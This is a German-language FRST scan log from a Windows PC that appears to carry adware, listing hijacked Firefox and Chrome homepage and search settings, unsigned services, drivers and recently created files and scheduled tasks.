BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_121\bin\jp2ssv.dll [2017-02-13] (Oracle Corporation)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2016-02-23] (CANON INC.)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\ssv.dll [2017-02-13] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\jp2ssv.dll [2017-02-13] (Oracle Corporation)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2016-02-23] (CANON INC.)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2016-02-23] (CANON INC.)
DPF: HKLM-x32 {166B1BCA-3F9C-11CF-8075-444553540000} hxxps://fpdownload.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: HKLM-x32 {233C1507-6A77-46A4-9443-F871F945D258} hxxps://fpdownload.macromedia.com/pub/shockwave/cabs/director/sw.cab

FireFox:
========
FF ProfilePath: C:\Users\Nick Schuster\AppData\Roaming\Mozilla\Firefox\Profiles\ajsmomju.default
FF NewTab: hxxp://www.initialsite123.com/?z=f1b5038898decb600b47077g1z9tfqae8b9m2tfz7w&from=icb&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&type=hp
FF DefaultSearchEngine: initialsite123
FF SelectedSearchEngine: initialsite123
FF Homepage: hxxp://www.ourluckysites.com/?type=hp&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX
FF Keyword.URL: user_pref("keyword.URL", true);
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_171.dll [2017-05-09] ()
FF Plugin: @java.com/DTPlugin,version=11.121.2 -> C:\Program Files\Java\jre1.8.0_121\bin\dtplugin\npDeployJava1.dll [2017-02-13] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.121.2 -> C:\Program Files\Java\jre1.8.0_121\bin\plugin2\npjp2.dll [2017-02-13] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50906.0\npctrl.dll [2017-03-09] ( Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [Keine Datei]
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_171.dll [2017-05-09] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.121.2 -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\dtplugin\npDeployJava1.dll [2017-02-13] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.121.2 -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\plugin2\npjp2.dll [2017-02-13] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50906.0\npctrl.dll [2017-03-09] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [Keine Datei]
FF Plugin HKU\S-1-5-21-3847841184-804715454-2304624315-1001: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll [Keine Datei]
FF SearchPlugin: C:\Users\Nick Schuster\AppData\Roaming\Mozilla\Firefox\Profiles\ajsmomju.default\searchplugins\ourluckysites.xml [2017-05-31]
StartMenuInternet: FIREFOX.EXE - C:\Program Files\Mozilla Firefox\firefox.exe hxxp://www.ourluckysites.com/?type=sc&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX

Chrome: 
=======
CHR HKLM\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3847841184-804715454-2304624315-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [bpegkgagfojjbcpkihigfmkojdmmimdf] - <kein Path/update_url>
CHR HKLM-x32\...\Chrome\Extension: [ehgldbbpchgpcfagfpfjgoomddhccfgh] - <kein Path/update_url>
CHR HKLM-x32\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.ourluckysites.com/?type=sc&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2246256 2017-05-18] (Adobe Systems, Incorporated)
S4 AppleAppSvc; C:\ProgramData\Apple\Temp\upgrade.ini [84 2017-05-31] () [Datei ist nicht signiert]
S4 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [108544 2017-04-26] () [Datei ist nicht signiert]
R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-06-01] (TODO: <公司名>) [Datei ist nicht signiert]
S4 DbxSvc; C:\Windows\system32\DbxSvc.exe [42096 2016-12-21] (Dropbox, Inc.)
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [101528 2017-05-31] ()
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [365048 2016-10-07] (Intel Corporation)
R2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [387144 2016-02-04] ()
S2 MCSvc; C:\Windows\System32\svchost.exe [38792 2014-11-21] (Microsoft Corporation)
S2 MCSvc; C:\Windows\SysWOW64\svchost.exe [33088 2014-11-21] (Microsoft Corporation)
R2 MVCSrv; C:\ProgramData\Package Cache\{2A002F88-FD5D-379B-A350-A25D84AF128B}v14.0.25420\packages\VisualC_D14\VC_IDE.Base\VC_IDE_Base.dll [105984 2017-03-28] () [Datei ist nicht signiert]
S4 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [2285664 2017-02-22] (Gold Click Ltd)
S2 SpyHunter 4 Service; C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe [665768 2016-11-16] (Enigma Software Group USA, LLC.)
S4 srcsrv; C:\Windows\src_srv\winsrcsrv.exe [17920 2017-05-29] () [Datei ist nicht signiert]
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
S4 SysLinkMapper; C:\ProgramData\F5C6DBD2-9E35-457F-B662-CF7D478FD412\winnetsvces.exe [9216 2017-04-18] () [Datei ist nicht signiert]
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [10888944 2017-04-25] (TeamViewer GmbH)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation)
R2 WinSAPSvc; C:\Users\Nick Schuster\AppData\Roaming\WinSAPSvc\WinSAP.dll [1886720 2017-06-01] () [Datei ist nicht signiert]
S2 ZbezjService; C:\Windows\SysWOW64\srvany.exe [8192 2003-04-18] () [Datei ist nicht signiert]
S2 3DM; C:\Users\Nick Schuster\AppData\Local\3DM\Kitty.dll [X]
S4 KingoSoftService; C:\Users\Nick Schuster\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\KingoSoftService.exe "C:\Users\Nick Schuster\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\checkupdate.exe"
S4 Kitty; C:\Users\Nick Schuster\AppData\Local\Kitty\Kitty.dll [X]
S2 kivojebi; C:\Program Files (x86)\0D8F6370-1479488272-81E4-3884-0071C2420BD3\kns20F0.tmp [X]
S4 Recover; C:\Program Files\Uninstall Information\FHND4RB6YGFG69477PK1CJU4XT48RPI\Odgt'YA#3N.exe [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 BthA2DP; C:\Windows\system32\drivers\BthA2DP.sys [132608 2015-01-30] (Microsoft Corporation)
S3 BthHFAud; C:\Windows\system32\DRIVERS\BthHfAud.sys [32768 2014-11-21] (Microsoft Corporation)
S3 DFX11_1; C:\Windows\system32\drivers\dfx11_1x64.sys [28008 2015-08-31] (Windows (R) Win 7 DDK provider)
S3 DFX12; C:\Windows\system32\drivers\dfx12x64.sys [29688 2015-11-12] (Windows (R) Win 7 DDK provider)
S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd.)
S3 dtlitescsibus; C:\Windows\System32\drivers\dtlitescsibus.sys [30264 2017-05-07] (Disc Soft Ltd)
S3 dtliteusbbus; C:\Windows\System32\drivers\dtliteusbbus.sys [47672 2017-05-07] (Disc Soft Ltd)
S3 dtproscsibus; C:\Windows\System32\drivers\dtproscsibus.sys [30264 2017-05-25] (Disc Soft Ltd)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
S3 esgiguard; C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [16432 2016-11-16] (Enigma Software Group USA, LLC.)
S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [22704 2016-11-23] ()
R3 iaLPSS_GPIO; C:\Windows\System32\drivers\iaLPSS_GPIO.sys [35832 2014-06-03] (Intel Corporation)
R3 MEIx64; C:\Windows\System32\drivers\TeeDriverW8x64.sys [204920 2016-12-02] (Intel Corporation)
R3 NETwNb64; C:\Windows\system32\DRIVERS\NETwbw02.sys [3526400 2017-03-09] (Intel Corporation)
S3 RTSUER; C:\Windows\system32\Drivers\RtsUer.sys [425216 2016-05-25] (Realsil Semiconductor Corporation)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [394296 2017-05-07] (Duplex Secure Ltd.)
S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd.)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [51712 2011-02-18] (Apple, Inc.) [Datei ist nicht signiert]
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Corporation)
S3 dbx; system32\DRIVERS\dbx.sys [X]
S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-06-03 14:01 - 2017-06-03 14:01 - 00000000 ____D C:\FRST
2017-06-02 18:05 - 2017-06-02 18:05 - 00004044 _____ C:\Windows\System32\Tasks\{25FE2E5B-9255-99F0-1368-8A42E54326C9}
2017-06-02 18:05 - 2017-06-02 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-6921-1
2017-06-02 18:05 - 2017-06-02 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-2583-0
2017-06-02 18:05 - 2017-06-02 18:05 - 00000000 ____D C:\ProgramData\{279BD4C5-9030-636E-34A5-319E03364EE3}
2017-06-01 19:22 - 2017-06-01 19:22 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Applemy
2017-06-01 18:05 - 2017-06-01 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-7817-0
2017-06-01 18:05 - 2017-06-01 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-3a25-1
2017-06-01 12:05 - 2017-06-01 12:05 - 00000000 ____D C:\ProgramData\f9d60eee-0b25-1
2017-06-01 12:05 - 2017-06-01 12:05 - 00000000 ____D C:\ProgramData\f9d60eee-07f7-0
2017-06-01 12:00 - 2017-06-01 12:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\glory
2017-06-01 00:19 - 2017-06-01 00:19 - 00001996 _____ C:\Windows\System32\Tasks\fyKiuMkkXh
2017-06-01 00:14 - 2017-06-01 00:19 - 00000002 _____ C:\END
2017-05-31 18:05 - 2017-05-31 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-7411-1
2017-05-31 18:05 - 2017-05-31 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-49f5-0
2017-05-31 13:53 - 2017-05-31 13:53 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Applemy
2017-05-31 13:52 - 2017-05-31 13:52 - 00000000 ____D C:\Users\Public\Documents\Google
2017-05-31 13:52 - 2017-05-31 13:52 - 00000000 ____D C:\Program Files (x86)\Firefox
2017-05-31 13:46 - 2017-05-31 13:48 - 00000000 ____D C:\Program Files (x86)\Applemy
2017-05-31 12:18 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\{5dc62cb3-512c-0}
2017-05-31 12:18 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\{241B54D7-93B0-E37C-7209-B5C3B4A67434}
2017-05-31 12:18 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\{1fc205d4-012c-1}
2017-05-31 12:05 - 2017-05-31 12:05 - 00023496 _____ C:\Windows\System32\Tasks\{0B047F47-0F0A-0408-0B11-087F0C0B110F}
2017-05-31 11:38 - 2017-05-31 11:38 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Obsidium
2017-05-31 11:36 - 2017-05-31 11:36 - 00000000 ____D C:\ProgramData\F5C6DBD2-9E35-457F-B662-CF7D478FD412
2017-05-31 11:22 - 2017-05-31 11:22 - 00023032 _____ (Wiper Software) C:\Windows\system32\wiperrm.exe
2017-05-31 11:22 - 2017-05-31 11:22 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\WiperSoft
2017-05-31 11:22 - 2017-05-31 11:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WiperSoft
2017-05-30 19:49 - 2017-05-30 19:51 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\{12A8CCFE-3C33-4995-BAD8-074E4C5B22FD}
2017-05-30 19:32 - 2017-05-31 13:53 - 00002326 _____ C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-05-30 19:32 - 2017-05-30 19:32 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Google
2017-05-30 19:23 - 2017-05-31 13:53 - 00002020 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-05-30 19:23 - 2017-05-30 19:23 - 00000000 ____D C:\Program Files\Mozilla Firefox
2017-05-30 13:59 - 2017-05-30 13:59 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Minerent
2017-05-30 13:58 - 2017-06-01 12:00 - 00000000 ____D C:\Program Files (x86)\Arucerther_
2017-05-30 13:58 - 2017-05-30 13:58 - 00000000 ____D C:\Users\Default\AppData\Local\AdvinstAnalytics
2017-05-30 13:58 - 2017-05-30 13:58 - 00000000 ____D C:\Users\Default User\AppData\Local\AdvinstAnalytics
2017-05-30 13:56 - 2017-05-30 16:14 - 00000000 ____D C:\Users\Default\AppData\Roaming\Minerent
2017-05-30 13:56 - 2017-05-30 16:14 - 00000000 ____D C:\Users\Default User\AppData\Roaming\Minerent
2017-05-30 13:56 - 2017-05-30 16:14 - 00000000 ____D C:\Program Files (x86)\Arucerther
2017-05-30 13:56 - 2017-05-30 13:56 - 00006006 _____ C:\Windows\System32\Tasks\Coobeck Monitor
2017-05-30 13:56 - 2017-05-30 13:56 - 00000000 ____D C:\Users\Default\AppData\Local\Cerzaentfisuge
2017-05-30 13:56 - 2017-05-30 13:56 - 00000000 ____D C:\Users\Default User\AppData\Local\Cerzaentfisuge
2017-05-30 13:55 - 2017-05-30 13:55 - 00000000 ____D C:\ProgramData\e9cf343f516c47a4a7255147ad1dcd13
2017-05-30 13:55 - 2017-05-30 13:55 - 00000000 ____D C:\ProgramData\ddef39d292cf4b8ea43c256f14555ff3
2017-05-29 22:02 - 2017-05-29 22:02 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\FBTime
2017-05-29 22:01 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\943973b1-7343-1
2017-05-29 22:01 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\943973b1-6925-0
2017-05-29 22:01 - 2017-05-29 22:01 - 00003034 _____ C:\Windows\System32\Tasks\ttwifi
2017-05-29 22:00 - 2017-05-29 22:02 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\AppTrailers
2017-05-29 22:00 - 2017-05-29 22:01 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\gplyra
2017-05-29 22:00 - 2017-05-29 22:01 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\gjtj1a4xugf
2017-05-29 22:00 - 2017-05-29 22:00 - 00016764 _____ C:\Windows\System32\Tasks\Quick Tharks Screen Saver
2017-05-29 22:00 - 2017-05-29 22:00 - 00003686 _____ C:\Windows\System32\Tasks\SoftUpgrade
2017-05-29 22:00 - 2017-05-29 22:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\devnull
2017-05-29 22:00 - 2017-05-29 22:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\AdvinstAnalytics
2017-05-29 22:00 - 2017-05-29 22:00 - 00000000 ____D C:\Program Files (x86)\SoftUpgrade
2017-05-29 21:59 - 2017-06-02 15:32 - 00003020 _____ C:\Windows\System32\Tasks\RunAtStartup
2017-05-29 21:59 - 2017-06-01 11:54 - 00000231 _____ C:\ServiceLog.txt
2017-05-29 21:59 - 2017-05-29 22:03 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Grerdaentlerveck
2017-05-29 21:59 - 2017-05-29 22:01 - 00000000 ____D C:\Windows\src_srv
2017-05-29 21:59 - 2017-05-29 22:01 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\yxuuo1zrzz4
2017-05-29 21:59 - 2017-05-29 22:00 - 00000000 ____D C:\Program Files (x86)\ProxyGate
2017-05-29 21:59 - 2017-05-29 21:59 - 00006038 _____ C:\Windows\System32\Tasks\Gerfety Renew
2017-05-29 21:59 - 2017-05-29 21:59 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\s0ac4g0fkg0
2017-05-29 21:59 - 2017-05-29 21:59 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Draveingplererward
2017-05-29 21:59 - 2017-05-29 21:59 - 00000000 ____D C:\ProgramData\VideoMemoryDiagnostic
2017-05-29 21:59 - 2017-05-29 21:59 - 00000000 ____D C:\Program Files (x86)\Prfasaretaly
2017-05-29 21:59 - 2017-05-29 21:59 - 00000000 ____D C:\Program Files (x86)\pccleanplus
2017-05-26 21:30 - 2017-05-26 21:30 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Babylon
2017-05-26 21:30 - 2017-05-26 21:30 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Babylon
2017-05-26 21:30 - 2017-05-26 21:30 - 00000000 ____D C:\ProgramData\Babylon
2017-05-26 18:05 - 2017-05-26 18:05 - 00000000 ____D C:\ProgramData\Electronic Arts
2017-05-26 17:40 - 2017-05-26 17:40 - 00000295 _____ C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Papierkorb.lnk
2017-05-26 09:40 - 2017-05-31 13:45 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\terana
2017-05-25 15:34 - 2017-05-25 15:36 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\DAEMON Tools Pro
2017-05-25 15:34 - 2017-05-25 15:34 - 00030264 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtproscsibus.sys
2017-05-25 15:33 - 2017-05-25 15:33 - 00000000 ____D C:\ProgramData\DAEMON Tools Pro
2017-05-23 15:44 - 2017-04-27 15:11 - 00678592 _____ (Microsoft Corporation) C:\Windows\system32\msvcp120_clr0400.dll
2017-05-23 15:44 - 2017-04-27 15:10 - 00536768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcp120_clr0400.dll
2017-05-23 15:43 - 2017-04-27 15:11 - 00869568 _____ (Microsoft Corporation) C:\Windows\system32\msvcr120_clr0400.dll
2017-05-23 15:43 - 2017-04-27 15:10 - 00875712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcr120_clr0400.dll
2017-05-23 15:42 - 2017-04-06 19:37 - 00445440 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2017-05-23 15:42 - 2017-04-06 19:16 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\wpd_ci.dll
2017-05-23 15:42 - 2017-04-06 18:50 - 01436672 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2017-05-23 15:42 - 2017-04-06 18:46 - 00434688 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2017-05-23 15:42 - 2017-04-06 18:46 - 00324096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2017-05-23 15:42 - 2017-04-06 18:35 - 01362432 _____ (Microsoft Corporation) C:\Windows\system32\gpsvc.dll
2017-05-23 15:42 - 2017-04-06 18:15 - 00358912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2017-05-23 15:42 - 2017-04-06 17:44 - 00087040 _____ (Microsoft Corporation) C:\Windows\system32\wpdbusenum.dll
2017-05-23 15:42 - 2017-04-02 16:49 - 00186880 _____ (Microsoft Corporation) C:\Windows\system32\dpapisrv.dll
2017-05-23 15:42 - 2017-04-02 15:40 - 02013016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2017-05-22 21:24 - 2017-05-22 21:24 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-05-18 22:17 - 2017-05-18 22:17 - 01499368 _____ (Microsoft Corporation) C:\Windows\system32\WdfCoInstaller01007.dll
2017-05-18 22:17 - 2017-05-18 22:17 - 00716880 _____ (Microsoft Corporation) C:\Windows\system32\WinUSBCoInstaller.dll
2017-05-18 22:17 - 2017-05-18 22:17 - 00166288 _____ (Samsung Electronics Co., Ltd.) C:\Windows\system32\Drivers\ssudmdm.sys
2017-05-18 22:17 - 2017-05-18 22:17 - 00131984 _____ (Samsung Electronics Co., Ltd.) C:\Windows\system32\Drivers\ssudbus.sys
2017-05-18 17:00 - 2017-05-22 17:09 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\CSHMDR
2017-05-15 16:30 - 2017-05-17 14:09 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\CWASRE
2017-05-15 00:05 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\f9d60eee-68a5-1
2017-05-15 00:05 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\f9d60eee-5f71-0
2017-05-14 16:16 - 2017-05-23 15:34 - 00000000 _____ C:\Windows\SysWOW64\1
2017-05-14 12:05 - 2017-05-14 12:05 - 00000000 ____D C:\ProgramData\f9d60eee-4cc1-0
2017-05-14 12:05 - 2017-05-14 12:05 - 00000000 ____D C:\ProgramData\f9d60eee-4593-1
2017-05-13 20:17 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\{1aa64fd2-712c-1}
2017-05-13 20:17 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\{02a407e1-212c-0}
2017-05-12 18:05 - 2017-05-12 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-5ad5-1
2017-05-12 18:05 - 2017-05-12 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-3ae5-0
2017-05-11 18:05 - 2017-05-11 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-6671-0
2017-05-11 18:05 - 2017-05-11 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-6115-1
2017-05-11 15:23 - 2017-05-11 15:23 - 00000000 _____ C:\Windows\SysWOW64\3333333
2017-05-11 15:22 - 2017-05-11 15:22 - 00000000 _____ C:\Windows\SysWOW64\1111
2017-05-11 15:22 - 2017-05-11 15:22 - 00000000 _____ C:\Windows\SysWOW64\00
2017-05-11 14:18 - 2017-04-28 23:15 - 07444824 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2017-05-11 14:18 - 2017-04-26 16:06 - 04169216 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2017-05-11 14:18 - 2017-04-16 12:23 - 02176584 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2017-05-11 14:18 - 2017-04-16 12:23 - 01662096 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2017-05-11 14:18 - 2017-04-16 12:23 - 01063464 _____ (Microsoft Corporation) C:\Windows\system32\WinTypes.dll
2017-05-11 14:18 - 2017-04-16 12:18 - 01135288 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2017-05-11 14:18 - 2017-04-16 12:18 - 00803192 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2017-05-11 14:18 - 2017-04-16 11:07 - 01566032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2017-05-11 14:18 - 2017-04-16 11:07 - 01213792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll
2017-05-11 14:18 - 2017-04-16 11:07 - 00548032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinTypes.dll
2017-05-11 14:18 - 2017-04-16 11:05 - 00612096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2017-05-11 14:18 - 2017-04-16 10:54 - 00576512 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2017-05-11 14:18 - 2017-04-16 10:54 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2017-05-11 14:18 - 2017-04-16 10:51 - 02899456 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2017-05-11 14:18 - 2017-04-16 10:37 - 00116224 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2017-05-11 14:18 - 2017-04-16 10:36 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2017-05-11 14:18 - 2017-04-16 10:35 - 25741312 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-05-11 14:18 - 2017-04-16 10:18 - 05977600 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-05-11 14:18 - 2017-04-16 10:16 - 00862720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2017-05-11 14:18 - 2017-04-16 10:10 - 00087552 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2017-05-11 14:18 - 2017-04-16 10:03 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2017-05-11 14:18 - 2017-04-16 10:02 - 00145408 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2017-05-11 14:18 - 2017-04-16 10:01 - 00499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
